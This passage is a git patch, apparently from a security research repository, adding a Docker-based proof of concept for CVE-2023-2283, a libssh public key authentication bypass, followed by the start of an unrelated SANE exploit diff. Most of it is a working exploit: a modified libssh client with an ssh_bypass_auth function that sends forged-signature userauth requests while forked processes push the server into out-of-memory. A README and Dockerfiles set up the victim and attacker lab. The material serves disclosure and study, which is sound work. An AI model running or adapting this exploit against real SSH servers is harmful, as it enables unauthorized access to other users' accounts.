.../server/home/.ssh/id_rsa.pub | 1 +
.../server/home/.tmux.conf | 11 +
13 files changed, 606 insertions(+)
create mode 100644 SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/README.md
create mode 100644 SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/Dockerfile
create mode 100644 SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/.bash_history
create mode 100644 SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/.tmux.conf
create mode 100644 SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/diff.txt
create mode 100644 SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/id_ed25519.pub
create mode 100644 SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/id_rsa.pub
create mode 100644 SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/Dockerfile
create mode 100644 SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.bash_history
create mode 100644 SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.ssh/authorized_keys
create mode 100644 SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.ssh/id_ed25519.pub
create mode 100644 SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.ssh/id_rsa.pub
create mode 100644 SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.tmux.conf
diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/README.md b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/README.md
new file mode 100644
index 0000000..6cfb209
--- /dev/null
+++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/README.md
@@ -0,0 +1,104 @@
+# Public key authentication bypass in libssh (CVE-2023-2283)
+
+[CVE-2023-2283](https://securitylab.github.com/advisories/GHSL-2023-085_libssh/)
+is an authentication bypass vulnerability in
+[libssh](https://www.libssh.org/), which, under certain conditions, may
+enable a remote attacker to gain unauthorized access to another user’s
+account via ssh login.
+
+This demo uses docker to simulate two computers, named "libssh-server"
+and "libssh-attacker". On libssh-server, we run `ssh_server_pthread`,
+which is a simple ssh server application that is [included as an
+example](https://gitlab.com/libssh/libssh-mirror/-/blob/e8322817a9e5aaef0698d779ddd467a209a85d85/examples/ssh_server.c)
+with the libssh source code. The server is configured to allow public
+key authentication with an ED25519 key, but the attacker does not know the
+private key. The attacker instead authenticates by triggering the vulnerability.
+
+The vulnerability is triggered when `ssh_server_pthread` hits an
+out-of-memory condition at precisely the right moment. If libssh is
+running on a 64-bit server with plenty of RAM then it is very unlikely
+that an attacker will be able to generate enough memory pressure to
+cause an out-of-memory error, which means that the vulnerability is
+unlikely to be exploitable. The goal of this demo is, instead, to show
+that the vulnerability is exploitable if libssh is running in a
+memory-constrained environment such as a [memory-constrained
+container](https://docs.docker.com/config/containers/resource_constraints/),
+which we believe is a realistic scenario for a real-life libssh deployment.
+The demo uses `ulimit` to set a 256MB memory limit on the ssh server.
+
+## Network setup
+
+Create a docker network bridge, to simulate a network with two separate computers.
+
+```
+docker network create -d bridge --subnet 172.18.0.0/16 libssh-demo-network
+```
+
+## Server setup
+
+Build the docker image:
+
+```
+docker build server -t libssh-server --build-arg UID=`id -u`
+```
+
+Start the container:
+
+```
+docker run --rm --network libssh-demo-network --ip=172.18.0.10 -it libssh-server
+```
+
+If you want to be able to debug the libssh server, then you need to start the container with some extra command line arguments:
+
+```
+docker run --rm --network libssh-demo-network --ip=172.18.0.10 --cap-add=SYS_PTRACE --security-opt seccomp=unconfined -it libssh-server
+```
+
+Inside the container, run these commands to create ssh keys for the server:
+
+```
+mkdir ~/testkeys
+ssh-keygen -P "" -t ecdsa -f ~/testkeys/id_ecdsa
+ssh-keygen -P "" -t rsa -f ~/testkeys/id_rsa
+```
+
+Start the server:
+
+```
+ulimit -v 262144 # 256MB
+~/libssh/build/examples/ssh_server_pthread -p 2022 -r ~/testkeys/id_rsa -e ~/testkeys/id_ecdsa -a ~/.ssh/authorized_keys 0.0.0.0
+```
+
+Note: ssh servers normally listen on port 22, but root privileges are required to listen on 22, so this demo uses port 2022 instead. Use `sudo` if you want to change the port number to 22. The `sudo` password in this docker container is "x".
+
+## Attacker setup
+
+Build the docker image:
+
+```
+docker build attacker -t libssh-attacker --build-arg UID=`id -u`
+```
+
+Start the container:
+
+```
+docker run --rm --network libssh-demo-network --ip=172.18.0.11 -it libssh-attacker
+```
+
+If you want to be able to debug the client, then you need to start the container with some extra command line arguments:
+
+```
+docker run --rm --network libssh-demo-network --ip=172.18.0.11 --cap-add=SYS_PTRACE --security-opt seccomp=unconfined -it libssh-attacker
+```
+
+The attacker uses a modified version of libssh. The modifications are in the file named `diff.txt` and are applied during the `docker build` step.
+
+Run the malicious client like this:
+
+```
+~/libssh/build/examples/ssh-client -p 2022 victim@172.18.0.10 ~/id_ed25519.pub
+```
+
+The vulnerability is triggered when the ssh server has an out-of-memory error at the exact right moment, which means that the PoC is unreliable. It runs in a loop until it's successful, which can often take several minutes. You may also need to run several instance of the PoC simultaneously to generate enough memory pressure on the server. I suggest using `tmux` to open three terminals and start 3 instances of the PoC. When one of the PoCs succeeds, it creates a file named "success.txt", which notifies the other instances that they should stop.
+
+Note: the PoC sometimes accidentally triggers a SIGSEGV in the server due to an unrelated [null-pointer dereference bug](https://gitlab.com/libssh/libssh-mirror/-/merge_requests/381). If this happens, you will need to restart the `ssh_server_pthread` process.
diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/Dockerfile b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/Dockerfile
new file mode 100644
index 0000000..21837c6
--- /dev/null
+++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/Dockerfile
@@ -0,0 +1,35 @@
+FROM ubuntu:22.04
+
+ENV DEBIAN_FRONTEND=noninteractive
+
+RUN apt-get update && \
+ apt-get install -y \
+ sudo tmux emacs git gdb cmake build-essential net-tools psmisc \
+ libssl-dev zlib1g-dev libkrb5-dev libkrb5-dbg
+
+ARG UID=1000
+
+# Create a non-root user account to run libssh.
+RUN adduser attacker --disabled-password --uid $UID
+
+# Grant the 'attacker' user sudo access. This is not used for the demo,
+# but it is often handy for installing extra packages.
+RUN adduser attacker sudo
+RUN echo "attacker:x" | chpasswd
+COPY home/ /home/attacker/
+RUN chown -R attacker:attacker /home/attacker
+
+# Switch over to the 'attacker' user, since root access is no longer required
+USER attacker
+WORKDIR /home/attacker
+
+# Clone and build libssh v0.10.4
+RUN git clone https://git.libssh.org/projects/libssh.git && \
+ cd libssh && \
+ git checkout e8322817a9e5aaef0698d779ddd467a209a85d85 && \
+ git apply ~/diff.txt && \
+ mkdir build && cd build && \
+ cmake .. && \
+ make -j $(nproc)
+
+USER attacker
diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/.bash_history b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/.bash_history
new file mode 100644
index 0000000..5df6160
--- /dev/null
+++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/.bash_history
@@ -0,0 +1 @@
+~/libssh/build/examples/ssh-client -p 2022 victim@172.18.0.10 ~/id_ed25519.pub
diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/.tmux.conf b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/.tmux.conf
new file mode 100644
index 0000000..f2da785
--- /dev/null
+++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/.tmux.conf
@@ -0,0 +1,11 @@
+# Enable 256 colors
+set -g default-terminal "screen-256color"
+
+# Enable using the mouse to switch windows.
+set -g mouse on
+
+# Don't lose track of SSH_AGENT etc. from parent environment.
+set -g update-environment -r
+
+# history buffer size
+set-option -g history-limit 100000
diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/diff.txt b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/diff.txt
new file mode 100644
index 0000000..c56191d
--- /dev/null
+++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/diff.txt
@@ -0,0 +1,399 @@
+diff --git a/examples/ssh_client.c b/examples/ssh_client.c
+index aaf0cb5b..4055a2c5 100644
+--- a/examples/ssh_client.c
++++ b/examples/ssh_client.c
+@@ -32,10 +32,12 @@
+ #include
+ #endif
+
++#include
+ #include
+ #include
+ #include
+ #include
++#include
+
+ #include
+ #include
+@@ -47,6 +49,7 @@
+
+ static char *host = NULL;
+ static char *user = NULL;
++static char *pubkey_filename = NULL;
+ static char *cmds[MAXCMD];
+ static char *config_file = NULL;
+ static struct termios terminal;
+@@ -89,7 +92,7 @@ static void add_cmd(char *cmd)
+ static void usage(void)
+ {
+ fprintf(stderr,
+- "Usage : ssh [options] [login@]hostname\n"
++ "Usage : ssh [options] [login@]hostname pubkey_file\n"
+ "sample client - libssh-%s\n"
+ "Options :\n"
+ " -l user : log in as user\n"
+@@ -134,12 +137,15 @@ static int opts(int argc, char **argv)
+ if (optind < argc) {
+ host = argv[optind++];
+ }
++ if (optind < argc) {
++ pubkey_filename = argv[optind++];
++ }
+
+ while(optind < argc) {
+ add_cmd(argv[optind++]);
+ }
+
+- if (host == NULL) {
++ if (host == NULL || pubkey_filename == NULL) {
+ return -1;
+ }
+
+@@ -321,12 +327,27 @@ static void batch_shell(ssh_session session)
+ ssh_channel_free(channel);
+ }
+
+-static int client(ssh_session session)
++static void kill_procs(const int nprocs, pid_t *cpids) {
++ int i;
++ for (i = 0; i+1 < nprocs; i++) {
++ const pid_t cpid = cpids[i];
++ if (cpid > 0) {
++ cpids[i] = -1;
++ kill(cpid, SIGTERM);
++ waitpid(cpid, 0, 0);
++ }
++ }
++}
++
++static int client(ssh_session session, const int myid, const int nprocs, pid_t *cpids)
+ {
+- int auth = 0;
+ char *banner;
+ int state;
++ int result;
+
++ if (ssh_options_set(session, SSH_OPTIONS_COMPRESSION_C_S, "zlib") < 0) {
++ return -1;
++ }
+ if (user) {
+ if (ssh_options_set(session, SSH_OPTIONS_USER, user) < 0) {
+ return -1;
+@@ -352,6 +373,7 @@ static int client(ssh_session session)
+ fprintf(stderr, "Connection failed : %s\n", ssh_get_error(session));
+ return -1;
+ }
++ printf("connection successful: %d\n", myid);
+
+ state = verify_knownhost(session);
+ if (state != 0) {
+@@ -364,16 +386,21 @@ static int client(ssh_session session)
+ printf("%s\n", banner);
+ free(banner);
+ }
+- auth = authenticate_console(session);
+- if (auth != SSH_AUTH_SUCCESS) {
++ result = ssh_bypass_auth(session, pubkey_filename, myid, nprocs);
++ if (myid == 0) {
++ kill_procs(nprocs, cpids);
++ }
++ if (result < 0) {
+ return -1;
++ } else {
++ // Write a file named success.txt
++ close(open("success.txt", O_WRONLY | O_CREAT, S_IRUSR | S_IWUSR));
+ }
+ if (cmds[0] == NULL) {
+ shell(session);
+ } else {
+ batch_shell(session);
+ }
+-
+ return 0;
+ }
+
+@@ -406,9 +433,48 @@ static void cleanup_pcap(void)
+ pcap = NULL;
+ }
+
+-int main(int argc, char **argv)
++static int run(int argc, char **argv)
+ {
+ ssh_session session;
++ pid_t cpids[5];
++ int result;
++
++ // Fork a few times to increase the amount of memory pressure on the server.
++ const int nprocs = 1 + (rand() % (1 + sizeof(cpids)/sizeof(cpids[0])));
++ int myid;
++ printf("nprocs = %d\n", nprocs);
++ for (myid = 1; myid < nprocs; myid++) {
++ struct timespec tm = {0};
++ pid_t cpid = fork();
++ if (cpid < 0) {
++ const int err = errno;
++ fprintf(stderr, "fork failed: %s\n", strerror(err));
++ exit(EXIT_FAILURE);
++ } else if (cpid == 0) {
++ break;
++ }
++
++ cpids[myid-1] = cpid;
++ // Short delay between each fork so that they don't all try to connect
++ // at once.
++ tm.tv_nsec = 1000000000L / 10;
++ nanosleep(&tm, 0);
++ }
++ if (myid == nprocs) {
++ myid = 0;
++ } else {
++ // Suppress output in the forks
++ const int stdin_new = open("/dev/null", O_RDONLY);
++ const int stdout_new = open("/dev/null", O_RDONLY);
++ const int stderr_new = open("/dev/null", O_RDONLY);
++ dup2(stdin_new, STDIN_FILENO);
++ dup2(stdout_new, STDOUT_FILENO);
++ dup2(stderr_new, STDERR_FILENO);
++ close(stdin_new);
++ close(stdout_new);
++ close(stderr_new);
++ }
++ printf("fork id %d\n", myid);
+
+ ssh_init();
+ session = ssh_new();
+@@ -427,7 +493,10 @@ int main(int argc, char **argv)
+ signal(SIGTERM, do_exit);
+
+ set_pcap(session);
+- client(session);
++ result = client(session, myid, nprocs, cpids);
++ if (myid == 0) {
++ kill_procs(nprocs, cpids);
++ }
+
+ ssh_disconnect(session);
+ ssh_free(session);
+@@ -435,5 +504,36 @@ int main(int argc, char **argv)
+
+ ssh_finalize();
+
+- return 0;
++ return result;
++}
++
++int main(int argc, char **argv)
++{
++ // Keep restarting the process until it's successful.
++ while (1) {
++ const pid_t cpid = fork();
++ if (cpid == 0) {
++ break;
++ } else if (cpid > 0) {
++ int wstatus = 0;
++ waitpid(cpid, &wstatus, 0);
++ if (WEXITSTATUS(wstatus) == EXIT_SUCCESS) {
++ return EXIT_SUCCESS;
++ }
++ } else {
++ return EXIT_FAILURE;
++ }
++ }
++
++ if (open("success.txt", O_RDONLY) >= 0) {
++ printf("Stopping because a file named success.txt was found.\n");
++ return EXIT_SUCCESS;
++ }
++
++ srand(time(0));
++ if (run(argc, argv) == 0) {
++ return EXIT_SUCCESS;
++ } else {
++ return EXIT_FAILURE;
++ }
+ }
+diff --git a/include/libssh/libssh.h b/include/libssh/libssh.h
+index 7857a77b..e79da840 100644
+--- a/include/libssh/libssh.h
++++ b/include/libssh/libssh.h
+@@ -508,6 +508,9 @@ LIBSSH_API void ssh_disconnect(ssh_session session);
+ LIBSSH_API char *ssh_dirname (const char *path);
+ LIBSSH_API int ssh_finalize(void);
+
++LIBSSH_API int ssh_bypass_auth(ssh_session session, const char* pubkey_filename, const int myid, const int nprocs);
++
++
+ /* REVERSE PORT FORWARDING */
+ LIBSSH_API ssh_channel ssh_channel_open_forward_port(ssh_session session,
+ int timeout_ms,
+diff --git a/src/client.c b/src/client.c
+index a35a28e1..e2facc4a 100644
+--- a/src/client.c
++++ b/src/client.c
+@@ -24,6 +24,7 @@
+ #include "config.h"
+
+ #include
++#include
+
+ #ifndef _WIN32
+ #include
+@@ -46,6 +47,7 @@
+ #include "libssh/misc.h"
+ #include "libssh/pki.h"
+ #include "libssh/kex.h"
++#include "libssh/string.h"
+
+ #define set_status(session, status) do {\
+ if (session->common.callbacks && session->common.callbacks->connect_status_function) \
+@@ -834,6 +836,138 @@ error:
+ }
+ }
+
++static int send_service_request(ssh_session session, ssh_string str, bool set_wontblock) {
++ ssh_buffer_pack(session->out_buffer, "bS", SSH2_MSG_SERVICE_REQUEST, str);
++ if (set_wontblock) {
++ ssh_socket_set_write_wontblock(session->socket);
++ }
++ if (ssh_packet_send(session) == SSH_ERROR) {
++ ssh_set_error(session, SSH_FATAL,
++ "Sending SSH2_MSG_UNIMPLEMENTED failed.");
++ printf("Sending SSH2_MSG_UNIMPLEMENTED failed.\n");
++ return -1;
++ }
++ return 0;
++}
++
++int ssh_bypass_auth(ssh_session session, const char *pubkey_filename, const int myid, const int nprocs) {
++ struct ssh_crypto_struct *crypto = ssh_packet_get_current_crypto(session, SSH_DIRECTION_BOTH);
++ size_t i, n;
++ int rc;
++ int result = -1;
++
++ if (myid > 0) {
++ size_t sizes[5] = {0x40000 - 5, 0x40000 - 5, 0x40000 - 5, 0x4000 - 5, 0xf00 - 5};
++ ssh_string str;
++ sleep(1);
++ assert(myid <= sizeof(sizes)/sizeof(sizes[0]));
++ const size_t slen = sizes[myid-1];
++ printf("slen = %lx\n", slen);
++ str = ssh_string_new(slen);
++ // note: ssh_string has a length field, so you don't have to nul-terminate them.
++ memset(ssh_string_data(str), 'x', slen);
++ for (i = 0; i < 192; i++) {
++ if (send_service_request(session, str, i >= 0) < 0) {
++ return result;
++ }
++ }
++ ssh_string_free(str);
++ pause();
++ } else {
++ const char *sig_type_c = NULL;
++ ssh_key pubkey = NULL;
++ ssh_string pubkey_s = NULL;
++
++ ssh_pki_import_pubkey_file(pubkey_filename, &pubkey);
++ ssh_pki_export_pubkey_blob(pubkey, &pubkey_s);
++
++ sig_type_c = ssh_key_get_signature_algorithm(session, pubkey->type);
++ printf("sig_type_c = %s\n", sig_type_c);
++ sleep(2);
++ for (i = 0; i < 100 && result < 0; i++) {
++ ssh_string username;
++ ssh_string service;
++ ssh_string algo;
++
++ // 0x37 is the maximum string length that will fit in an 0x40-sized malloc chunk.
++ username = ssh_string_new(0x37 + i * 0x400);
++ memset(ssh_string_data(username), 0, ssh_string_len(username));
++ if (ssh_string_fill(username, session->opts.username, strlen(session->opts.username)) < 0) {
++ printf("username is too long: %s\n", session->opts.username);
++ return result;
++ }
++ service = ssh_string_new(0x37 + i * 0x500);
++ memset(ssh_string_data(service), 0, ssh_string_len(service));
++ ssh_string_fill(service, "ssh-connection", 15);
++ algo = ssh_string_new(1);
++ memset(ssh_string_data(algo), 'x', ssh_string_len(algo));
++ printf("send userauth 0\n");
++ ssh_buffer_pack(session->out_buffer, "bSSsbSS",
++ SSH2_MSG_USERAUTH_REQUEST,
++ username,
++ service,
++ "publickey",
++ 1, /* private key */
++ algo,
++ pubkey_s /* public key */
++ );
++ ssh_string_free(username);
++ ssh_string_free(service);
++ ssh_string_free(algo);
++
++ ssh_string fakesig = ssh_string_new(90 /*i == 0 ? 400 : 0x400 * i*/);
++ memset(ssh_string_data(fakesig), 'x', ssh_string_len(fakesig));
++ ssh_string sigtype = ssh_string_from_char(sig_type_c);
++ size_t sigtypelen = ssh_string_len(sigtype) + sizeof(uint32_t);
++ ssh_string payload = ssh_string_new(ED25519_SIG_LEN);
++ memcpy(ssh_string_data(payload), "kevwozere", 10);
++ size_t payloadlen = ssh_string_len(payload) + sizeof(uint32_t);
++ assert(sigtypelen + payloadlen <= ssh_string_len(fakesig));
++ memcpy(ssh_string_data(fakesig), sigtype, sigtypelen);
++ memcpy((char*)ssh_string_data(fakesig) + sigtypelen, payload, payloadlen);
++ ssh_string_free(sigtype);
++ ssh_string_free(payload);
++ ssh_buffer_pack(session->out_buffer, "S", fakesig);
++ ssh_string_free(fakesig);
++ session->auth.service_state = SSH_AUTH_SERVICE_SENT;
++ session->auth.current_method = SSH_AUTH_METHOD_PUBLICKEY;
++ session->auth.state = SSH_AUTH_STATE_PUBKEY_AUTH_SENT;
++ session->pending_call_state = SSH_PENDING_CALL_AUTH_PUBKEY;
++
++ printf("out_buf size: %x\n", ssh_buffer_get_len(session->out_buffer));
++ if (ssh_packet_send(session) == SSH_ERROR) {
++ ssh_set_error(session, SSH_FATAL,
++ "Sending SSH2_MSG_UNIMPLEMENTED failed.");
++ return result;
++ }
++ printf("send userauth 1\n");
++
++ // If the userauth message was unsuccessful then we don't get
++ // a reply from the server. So we send a short service request
++ // message, which will get a reply. Then we can tell from
++ // which type of reply we receive whether the userauth was
++ // successful.
++ {
++ ssh_string str = ssh_string_from_char("x");
++ if (send_service_request(session, str, true) < 0) {
++ return result;
++ }
++ ssh_string_free(str);
++ }
++
++ rc=ssh_handle_packets_termination(session,SSH_TIMEOUT_USER,
++ ssh_service_request_termination, session);
++ printf("rc = %d\n", rc);
++ if (session->auth.state == SSH_AUTH_STATE_SUCCESS) {
++ result = 0;
++ }
++ }
++ ssh_string_free(pubkey_s);
++ ssh_key_free(pubkey);
++ }
++ return result;
++}
++
+ const char *ssh_copyright(void)
+ {
+ return SSH_STRINGIFY(LIBSSH_VERSION) " (c) 2003-2022 "
+diff --git a/src/libssh.map b/src/libssh.map
+index eeb625c5..f20d89b9 100644
+--- a/src/libssh.map
++++ b/src/libssh.map
+@@ -188,6 +188,7 @@ LIBSSH_4_5_0 # Released
+ ssh_connector_set_out_channel;
+ ssh_connector_set_out_fd;
+ ssh_copyright;
++ ssh_bypass_auth;
+ ssh_dirname;
+ ssh_disconnect;
+ ssh_dump_knownhost;
diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/id_ed25519.pub b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/id_ed25519.pub
new file mode 100644
index 0000000..1ecefa0
--- /dev/null
+++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/id_ed25519.pub
@@ -0,0 +1 @@
+ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDG8eH3ZcBaTcwg/Gclb+ZYWZRQh9RvHQnQNY/lIa8mW victim@b1b586610139
diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/id_rsa.pub b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/id_rsa.pub
new file mode 100644
index 0000000..7efed1a
--- /dev/null
+++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/id_rsa.pub
@@ -0,0 +1 @@
+ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDVIGdVtCjMEzzbewMED01wAqaBcU6HytjUJoZt9Cm3lS0C691ZPayL14aj5uC9H73JDAabl58IEy6k++Wb5ryp74pozZ/H3swAuJlBidbeAUjtQbM5cxBT9hO7XE9YdHTXLzmVSF2NzyTt2HSZJPpYKsh0k7O56kfk/DfrIU7qGcIoDTNgK8zErXN2CjQ0dqm/sDZP1rxfHOfvLvTKx3WA30ko9c+zrIEJZ9pHV/OALOxPHf4WDewsMH3g1nG52hei2NG6r8nLP4BSEKcTbrebI6/RKOfXaFROMN01g9SY6Y0XmG0vAsyyRw0+oJMKAaoYgtokfBbJUJRtZ3uFavcA1DGRYn1Kswbwg+ZWMYoPRTTJ/Hzl8DqViWUOdsu9kHm24orPJZEajAo6kvjEjUQj2CKMbUVbxYB54S+taSXDhbeYWx1hACN/L8FufLdtW2veeuUOKJ0MtOMRCu5uCvLI7Y2wI6xxGa3jHOap81jyNa1vuMYfkk1z3jk5Ol5rlKE= victim@b1b586610139
diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/Dockerfile b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/Dockerfile
new file mode 100644
index 0000000..97d50ea
--- /dev/null
+++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/Dockerfile
@@ -0,0 +1,35 @@
+FROM ubuntu:22.04
+
+ENV DEBIAN_FRONTEND=noninteractive
+
+RUN apt-get update && \
+ apt-get install -y \
+ sudo tmux emacs git gdb cmake build-essential net-tools psmisc \
+ libssl-dev zlib1g-dev libkrb5-dev libkrb5-dbg \
+ libc6-dbg
+
+ARG UID=1000
+
+# Create a non-root user account to run libssh.
+RUN adduser victim --disabled-password --uid $UID
+
+# Grant the 'victim' user sudo access. This is not used for the demo,
+# but it is often handy for installing extra packages.
+RUN adduser victim sudo
+RUN echo "victim:x" | chpasswd
+COPY home/ /home/victim/
+RUN chown -R victim:victim /home/victim
+
+# Switch over to the 'victim' user, since root access is no longer required
+USER victim
+WORKDIR /home/victim
+
+# Clone and build libssh v0.10.4
+RUN git clone https://git.libssh.org/projects/libssh.git && \
+ cd libssh && \
+ git checkout e8322817a9e5aaef0698d779ddd467a209a85d85 && \
+ mkdir build && cd build && \
+ cmake .. && \
+ make -j $(nproc)
+
+USER victim
diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.bash_history b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.bash_history
new file mode 100644
index 0000000..d291675
--- /dev/null
+++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.bash_history
@@ -0,0 +1,5 @@
+mkdir ~/testkeys
+ssh-keygen -P "" -t ecdsa -f ~/testkeys/id_ecdsa
+ssh-keygen -P "" -t rsa -f ~/testkeys/id_rsa
+ulimit -v 262144
+~/libssh/build/examples/ssh_server_pthread -p 2022 -r ~/testkeys/id_rsa -e ~/testkeys/id_ecdsa -a ~/.ssh/authorized_keys 0.0.0.0
diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.ssh/authorized_keys b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.ssh/authorized_keys
new file mode 100644
index 0000000..1ecefa0
--- /dev/null
+++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.ssh/authorized_keys
@@ -0,0 +1 @@
+ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDG8eH3ZcBaTcwg/Gclb+ZYWZRQh9RvHQnQNY/lIa8mW victim@b1b586610139
diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.ssh/id_ed25519.pub b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.ssh/id_ed25519.pub
new file mode 100644
index 0000000..1ecefa0
--- /dev/null
+++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.ssh/id_ed25519.pub
@@ -0,0 +1 @@
+ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDG8eH3ZcBaTcwg/Gclb+ZYWZRQh9RvHQnQNY/lIa8mW victim@b1b586610139
diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.ssh/id_rsa.pub b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.ssh/id_rsa.pub
new file mode 100644
index 0000000..7efed1a
--- /dev/null
+++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.ssh/id_rsa.pub
@@ -0,0 +1 @@
+ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDVIGdVtCjMEzzbewMED01wAqaBcU6HytjUJoZt9Cm3lS0C691ZPayL14aj5uC9H73JDAabl58IEy6k++Wb5ryp74pozZ/H3swAuJlBidbeAUjtQbM5cxBT9hO7XE9YdHTXLzmVSF2NzyTt2HSZJPpYKsh0k7O56kfk/DfrIU7qGcIoDTNgK8zErXN2CjQ0dqm/sDZP1rxfHOfvLvTKx3WA30ko9c+zrIEJZ9pHV/OALOxPHf4WDewsMH3g1nG52hei2NG6r8nLP4BSEKcTbrebI6/RKOfXaFROMN01g9SY6Y0XmG0vAsyyRw0+oJMKAaoYgtokfBbJUJRtZ3uFavcA1DGRYn1Kswbwg+ZWMYoPRTTJ/Hzl8DqViWUOdsu9kHm24orPJZEajAo6kvjEjUQj2CKMbUVbxYB54S+taSXDhbeYWx1hACN/L8FufLdtW2veeuUOKJ0MtOMRCu5uCvLI7Y2wI6xxGa3jHOap81jyNa1vuMYfkk1z3jk5Ol5rlKE= victim@b1b586610139
diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.tmux.conf b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.tmux.conf
new file mode 100644
index 0000000..f2da785
--- /dev/null
+++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.tmux.conf
@@ -0,0 +1,11 @@
+# Enable 256 colors
+set -g default-terminal "screen-256color"
+
+# Enable using the mouse to switch windows.
+set -g mouse on
+
+# Don't lose track of SSH_AGENT etc. from parent environment.
+set -g update-environment -r
+
+# history buffer size
+set-option -g history-limit 100000
From 9539ec35eac2e06b76438c163b783efbe896f66a Mon Sep 17 00:00:00 2001
From: Kevin Backhouse
Date: Thu, 6 Jul 2023 16:13:59 +0100
Subject: [PATCH 15/53] Fix build error
---
.../SANE/epsonds_CVE-2020-12861/sane_backends_exploit.cpp | 3 +++
1 file changed, 3 insertions(+)
diff --git a/SecurityExploits/SANE/epsonds_CVE-2020-12861/sane_backends_exploit.cpp b/SecurityExploits/SANE/epsonds_CVE-2020-12861/sane_backends_exploit.cpp
index 1a36262..e5fbbcb 100644
--- a/SecurityExploits/SANE/epsonds_CVE-2020-12861/sane_backends_exploit.cpp
+++ b/SecurityExploits/SANE/epsonds_CVE-2020-12861/sane_backends_exploit.cpp
@@ -3,6 +3,9 @@
#include
#include